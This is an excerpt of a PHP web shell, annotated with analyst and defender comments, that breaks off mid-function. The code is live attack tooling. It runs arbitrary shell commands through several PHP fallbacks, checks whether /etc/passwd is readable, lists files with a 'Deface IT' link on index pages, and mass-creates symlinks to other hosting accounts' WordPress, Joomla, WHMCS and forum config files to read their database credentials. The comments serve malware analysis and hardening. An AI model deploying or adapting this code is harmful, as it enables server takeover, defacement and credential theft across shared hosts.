    } elseif (function_exists('shell_exec')) {
        $out = shell_exec($in);
    } elseif (is_resource($f = @popen($in,"r"))) {
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
828
// Runs the shell command $command and returns its output passed through
// htmlspecialchars(). The first function that exists is used, in this order:
// exec(), shell_exec(), popen(), system(), passthru(), proc_open().
// NOTE(analysis): a third command-execution helper next to execmd() and
// myexe(); unlike those it HTML-escapes the output. In the popen and proc_open
// branches the handle is closed with pclose() outside the is_resource() check.
function exec_all($command)
{

    $output = '';
    if(function_exists('exec'))
    {
        exec($command,$output);
        $output = join("\n",$output);
    }

    else if(function_exists('shell_exec'))
    {
        $output = shell_exec($command);
    }

    else if(function_exists('popen'))
    {
        $handle = popen($command , "r"); // Open the command pipe for reading
        if(is_resource($handle))
        {
            if(function_exists('fread') && function_exists('feof'))
            {
                while(!feof($handle))
                {
                    $output .= fread($handle, 512);
                }
            }
            else if(function_exists('fgets') && function_exists('feof'))
            {
                while(!feof($handle))
                {
                    $output .= fgets($handle,512);
                }



            }
        }
        pclose($handle);
    }


    else if(function_exists('system'))
    {
        ob_start(); //start output buffering
        system($command);
        $output = ob_get_contents(); // Get the output
        ob_end_clean(); // Stop output buffering
    }

    else if(function_exists('passthru'))
    {
        ob_start(); //start output buffering
        passthru($command);
        $output = ob_get_contents(); // Get the output
        ob_end_clean(); // Stop output buffering
    }

    else if(function_exists('proc_open'))
    {
        $descriptorspec = array(
            1 => array("pipe", "w"), // stdout is a pipe that the child will write to
        );
        $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
        if(is_resource($handle))
        {
            if(function_exists('fread') && function_exists('feof'))
            {
                while(!feof($pipes[1]))
                {
                    $output .= fread($pipes[1], 512);
                }
            }
            else if(function_exists('fgets') && function_exists('feof'))
            {
                while(!feof($pipes[1]))
                {
                    $output .= fgets($pipes[1],512);
                }
            }
        }
        pclose($handle);
    }

    return(htmlspecialchars($output));

}
916
// Status values for the panel header: an ON/OFF badge for the open_basedir
// restriction and a Yes/No flag for whether /etc/passwd is readable by the
// PHP process.
$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"<font color='red'>OFF</font>";
$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
919
// Returns an "owner / group" label for the path $value.
// Without the POSIX extension it falls back to the numeric uid/gid of the
// running script ("uid/gid") and ignores $value; with it, the file's owner and
// group ids are resolved to names.
function getOGid($value)
{
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
        $owner = $uid . "/". $gid;
        return $owner;
    } else {
        $name=@posix_getpwuid(@fileowner($value));
        $group=@posix_getgrgid(@filegroup($value));
        $owner = $name['name']. " / ". $group['name'];
        return $owner;
    }
}
936
// Renders the panel's file-manager view of $dir: a table with one row per
// entry showing size, permission string, owner/group (non-Windows),
// modification time and rename / download / checkbox controls, followed by a
// bulk-action selector (delete, chmod, compress, uncompress).
// Entries named index.php, index.html, config.php or wp-config.php, and the
// entry matching the running script, are highlighted in red; index.php and
// index.html additionally get a "Deface IT" link when the global $ind is
// non-empty.
// NOTE(analysis): paths are embedded in HTML and inline JavaScript with only
// addslashes() applied. On a compromised host, the highlighted names show
// which files the operator was steered towards: review index and config files
// for modification and rotate any credentials stored in them.
function mainfun($dir)
{
    global $ind, $directorysperator,$os;

    $mydir = basename(dirname(__FILE__));
    $pdir = str_replace($mydir,"",$dir);
    $pdir = str_replace("/","",$dir);

    $files = array();
    $dirs = array();

    // Split the directory's entries into sub-directories and everything else.
    $odir=opendir($dir);
    while($file = readdir($odir))
    {
        if(is_dir($dir.'/'.$file))
        {
            $dirs[]=$file;
        }
        else
        {
            $files[]=$file;
        }
    }
    $countfiles = count($dirs) + count($files);
    $dircount = count($dirs);
    // Exclude the "." and ".." entries from the displayed directory count.
    $dircount = $dircount-2;
    $myfiles = array_merge($dirs,$files);
    $i = 0;
    if(is_dir($dir))
    {
        if(scandir($dir) === false)
            echo "<center><font size=3>Directory isn't readable</font></center>";
        else
        {
?><form method="post" id="myform" name="myform">
 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
 <tr style="background-color:#0C0C0C;"><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
 <tr style="background-color:#0C0C0C; height:12px;">
 <th>Name</th>
 <th>Size</th>
 <th>Permissions</th>
 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
 <th>Modification Date</th>
 <th>Rename</th>
 <th>Download</th>
 <th style="width:2%;">Action</th>
 </tr>
 <?php
 // One row per entry. $vv is the entry's full path passed through
 // addslashes() so it can sit inside the single-quoted JavaScript arguments.
 foreach($myfiles as $val)
 {
 $vv = addslashes($dir . $directorysperator . $val);
 $i++;

 if($val == ".")
 {
 // Row for the current directory.

 ?><tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>

 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($dir)."</font></td>";
 }
 ?>

 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
 <td></td><td></td><td></td></</tr><?php

 }
 else if($val == "..")
 {
 // Row for the parent directory; Trail() strips "<name>/.." down to the parent path.
 $val = Trail($dir . $directorysperator . $val,$directorysperator);
 $vv = addslashes($val);
 if(empty($vv))
 $vv = "/"; ?>
 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'"><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";

 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
 <td></td><td></td><td></td></tr><?php continue;
 }
 else if(is_dir($vv))
 {
 // Row for a sub-directory: navigation link, permissions, rename, checkbox.
 ?>
 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
 <td class='info'><font size=2>DIR</font></td>

 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";
 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
 <td></td>
 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
 </tr></font>
 <?php
 }
 else if(is_file($vv))
 {
 // Row for a regular file. The name cell is where index/config files are
 // highlighted and where the "Deface IT" link is attached to index files.
 ?>
 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>

 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>

 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>

 <?php if($os != 'Windows')
 {
 echo "<td align=center><font size=2>";
 echo getOGid($val)."</font></td>";
 } ?>
 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>

 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
 </tr>
 <p>
 <?php
 }
 }

 // Bulk-action footer. The class_exists('ZipArchive') text sits inside the
 // string literal, so it is sent to the browser rather than evaluated.
 echo "</table>
<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
<select class=sbox name=choice style='width: 100px;'>
 <option value=delete>Delete</option>
 <option value=chmod>Change mode</option>
 if(class_exists('ZipArchive'))
 { <option value=compre>Compress</option>
 <option value=uncompre>Uncompress</option> }
 </select>

 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
 }}
    else
    {
        // The request's ?dir= value is echoed back without escaping.
        echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
    }

}
// Menu for the config-file locator: shown when the request carries `script`.
// It only renders two links that call the client-side getdata() helper with
// 'manuallyscript' or 'scriptlocator'; nothing is read from or written to disk.
1089if(isset($_REQUEST["script"]))
1090{
 // NOTE(review): $getpath is assigned here but never read inside this branch.
1091 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
1092 ?>
1093 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('manuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
1094 <td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
1095 </tr></table></center>
1096 <?php
1097}
// "Do It Manually" form: a textarea named `passwd` whose content is handed to
// the client-side manuallyscriptfn() helper when the button is clicked.
// NOTE(review): presumably that helper sends the text back as the `passwd`
// request parameter that the 'scriptlocator' branch reads; the JavaScript is
// not part of this excerpt, so confirm against the full sample.
1098else if(isset($_REQUEST['manuallyscript']))
1099{
1100 ?>
1101 <center>
1102 <form action="<?php echo $self; ?>" method="post">
1103 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
1104 <input type="button" OnClick="manuallyscriptfn(passwd.value)" value="Get Config" class="but">
1105 </form>
1106 </center>
1107 <?php
1108}
1109else if(isset($_REQUEST['scriptlocator']))
1110{
1111 if(stristr(php_uname(),"Linux"))
1112 {
1113 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1114 $path=explode('/',$url);
1115 $url =str_replace($path[count($path)-1],'',$url);
// syml(): for one hosting account name, create symbolic links in the current
// working directory that point at conventional application config locations
// under /home and /home2../home7 (<root>/<usern>/public_html/...).
//   $usern   - account directory name, concatenated into each target path as-is
//   $pdomain - prefix of every link name ("<pdomain>~~<label>.txt")
// The labels name the applications being probed (vBulletin, MyBB, phpBB, IPB,
// WordPress, Joomla, "Whm*", SMF, mk-portale, ...). No symlink() return value
// is checked and the function returns nothing.
// NOTE(review): link names repeat (e.g. "~~vBulletin5.txt" twice under /home,
// and the same labels again for every /homeN root); symlink() does not replace
// an existing name, so presumably only the first call per name leaves a link.
// Defender notes: the on-disk indicator is a directory full of symlinks whose
// names contain "~~" and end in ".txt" and whose targets sit in another
// account's public_html. Reading them over HTTP depends on the web server
// following links whose target it does not own; Apache's SymLinksIfOwnerMatch
// (instead of FollowSymLinks), listing symlink in PHP's disable_functions,
// open_basedir and per-account filesystem isolation are the usual hardening
// points, together with config files that are not world-readable.
1116 function syml($usern,$pdomain)
1117 {
1118 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1119 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1120 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1121 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1122 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1123 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1124 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1125 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1126 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
1127 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1128 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1129 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1130 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1131 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1132 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1133 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1134 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1135 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1136 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1137 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1138 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1139 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1140 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1141 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1142 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1143 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1144 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1145 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1146 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1147 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1148 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1149 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1150 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1151 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1152 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1153 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1154 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1155 symlink('/home2/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1156 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1157 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1158 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb2.txt');
1159 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1160 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1161 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1162 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1163 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1164 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1165 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1166 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1167 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1168 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1169 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1170 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1171 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1172 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1173 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1174 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1175 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1176 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1177 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1178 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1179 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1180 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1181 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1182 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1183 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1184 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1185 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1186 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1187 symlink('/home3/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1188 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1189 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1190 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb3.txt');
1191 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1192 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1193 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1194 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1195 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1196 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1197 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1198 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1199 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1200 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1201 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1202 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1203 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1204 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1205 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1206 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1207 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1208 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1209 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1210 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1211 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1212 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1213 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1214 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1215 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1216 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1217 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1218 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1219 symlink('/home4/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1220 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1221 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1222 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb4.txt');
1223 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1224 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1225 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1226 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1227 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1228 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1229 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1230 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1231 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1232 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1233 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1234 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1235 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1236 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1237 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1238 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1239 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1240 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1241 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1242 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1243 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1244 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1245 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1246 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1247 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1248 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1249 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1250 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1251 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1252 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1253 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb5.txt');
1254 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1255 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1256 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1257 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1258 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1259 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1260 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1261 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1262 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1263 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1264 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1265 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1266 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1267 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1268 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1269 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1270 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1271 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1272 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1273 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1274 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1275 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1276 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1277 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1278 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1279 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1280 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1281 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1282 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1283 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1284 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1285 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1286 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1287 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1288 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1289 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1290 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1291 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1292 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
